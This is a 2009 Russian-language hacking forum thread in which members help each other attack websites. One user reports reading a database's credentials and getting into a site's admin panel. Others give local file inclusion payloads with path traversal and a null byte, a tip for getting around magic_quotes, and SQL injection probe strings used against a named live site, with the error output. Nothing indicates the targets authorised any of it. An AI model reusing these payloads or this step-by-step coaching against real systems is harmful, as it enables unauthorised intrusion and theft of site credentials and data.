Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Вопрос

    Я то в базу попал смотрю все пароли в
    ibf_members_converge потом беру меняю на свой пассворд захожу в сайт/admin и ничего
     
    1 person likes this.
  2. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Я до этого не читал что там и как, но рискну предположить что ты поменял только хеш, но не соль.
    непомню табличку, погугли.
     
    1 person likes this.
  3. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Я же тебе в личку писал..что это база форума..и что все пароли из этой базы только к форуму...
    а в файле cfg.php пароль и логин для подключения к другой базе...где другие таблицы и другие пароли...
     
  4. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    ответ

    да я попал в phpAdmin
    там всего 2 базы
    1-База форума
    2-information_schema

    в information_schema всего 17 полей я все просмотрел ничего про пароли нет!

    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    PROFILING
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    # Обзор USER_PRIVILEGES
    # Обзор VIEWS
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 massovka:

    жжошь:))) Я даже не знаю, что сказать на это. Все эти "17 полей", которые на самом деле таблицы, бесполезны и всегда даже пропускаются при дампе базы
     
  6. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    information_schema это системна бд мускуля 5 ветки...ты там максимум можешь только таблички узнать.колонки..и базды данных..(названия)
    Я тебе ещё раз говорю..подключись к базе используя логин и пароль в файле cfg.php
     
  7. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Спасибо


    Все спасибо всем наконец получилось оказуется там еще одна база была и все это время я нетам смотрел! что значит чайник :D :D :D :D

    прочита пароль и попал в админку
     
    #6647 massovka, 15 Apr 2009
    Last edited: 15 Apr 2009
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    юзер под которого ты зашёл в пма не имеет прав на доступ к таблице админкиверрнее к бд
    делай чё демоноид говорит
     
    2 people like this.
  9. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    Всем привет
    ПХП иньекциями заинтересовался, нашел кое-что, хотел бы чтобы прояснили:

    УРЛ
    Code:
    http://www.server.com/?lang=en

    HTML:
    Warning: include(tmpl/en/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot\server\index.php on line 41
    
    Warning: include() [function.include]: Failed opening 'tmpl/en/error.htm' for inclusion (include_path='.;C:\php5\pear') in C:\Inetpub\wwwroot\server\index.php on line 41
    
    ------

    Code:
    http://www.server.com/?lang=http://www.google.com
    HTML:
    Warning: include(tmpl/http://www.google.com/error.htm) [function.include]: failed to open stream: Invalid argument in C:\Inetpub\wwwroot\server\index.php on line 41
    
    Warning: include() [function.include]: Failed opening 'tmpl/http://www.google.com/error.htm' for inclusion (include_path='.;C:\php5\pear') in C:\Inetpub\wwwroot\server\index.php on line 41

    Выходит, что разрешен инклудинг только локальных файлов?
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ага, LFI
     
  11. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    ...и ТОЛЬКО из директории "tmpl/"?
    можно ли еще что-то выцепить или дохлый номер?
     
  12. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 4adr0s
    нет, можешь подняться выше: ../../../../boot.ini%00
    если директива magic_quotes включена, то попробуй обойти http://raz0r.name/articles/null-byte-alternative/

    з.ы. 2 Spyder, я знаю, но у меня на практике, в боевых условиях ниразу не выходило, поэтому так и написал
     
    #6652 Iceangel_, 15 Apr 2009
    Last edited: 15 Apr 2009
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Iceangel_
    смотри репу)
    меджик квотс обходятся
     
  14. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Я тут пытался провести SQL-inj И у меня не получается, помогите плиз...
    Ошибочка id=1'
    Так тоже ошибка id=1'--
    Потом востановил запрос id=1--
    Затем попробовал попробовать id=1+and+1=1-- ошибки нет
    id=1+and+1=2-- ошибки нет
    И так тоже нет ошибки id=1+group+by+99--

    как можно попробовать?
     
  15. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Мде ни текста ошибки,ни хрена...(
    Урл вообще в идеале.....

    Поставь "+" в конец запроса,может из за отсутсвия пробела дальнейший запрос не обрезаеться(Это лишь предположение,мож скули нет,вообще)
     
  16. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    Byrger
    если id=1+or+1=1-- и id=1+or+1=2-- разные тогда это скуля
    если нет тогда пробуй id=1'+or+1=1-- id=1'+or+1=2--
     
  17. IDW

    IDW New Member

    Joined:
    8 Sep 2008
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1

    Можно тут что-нибудь сделать?
     
  18. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0

    Неа... все жестко, и мир жесток...

    Code:
    Warning: include(tmpl/../../../../../../../../../../boot.ini/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot
     
  19. IDW

    IDW New Member

    Joined:
    8 Sep 2008
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    http://catalog.uvaga.by/model_mark/?go=-1+order+by+1--
     
    1 person likes this.
  20. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    А ты понаблюдай за запросом и поведением ошибки и сам попробуй понять можно или нет:
    Code:
    http://catalog.uvaga.by/model_mark/?go=-1
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1

    Code:
    http://catalog.uvaga.by/model_mark/?go=-10
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30,3' at line 1

    Code:
    http://catalog.uvaga.by/model_mark/?go=-100
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-300,3' at line 1
     
Thread Status:
Not open for further replies.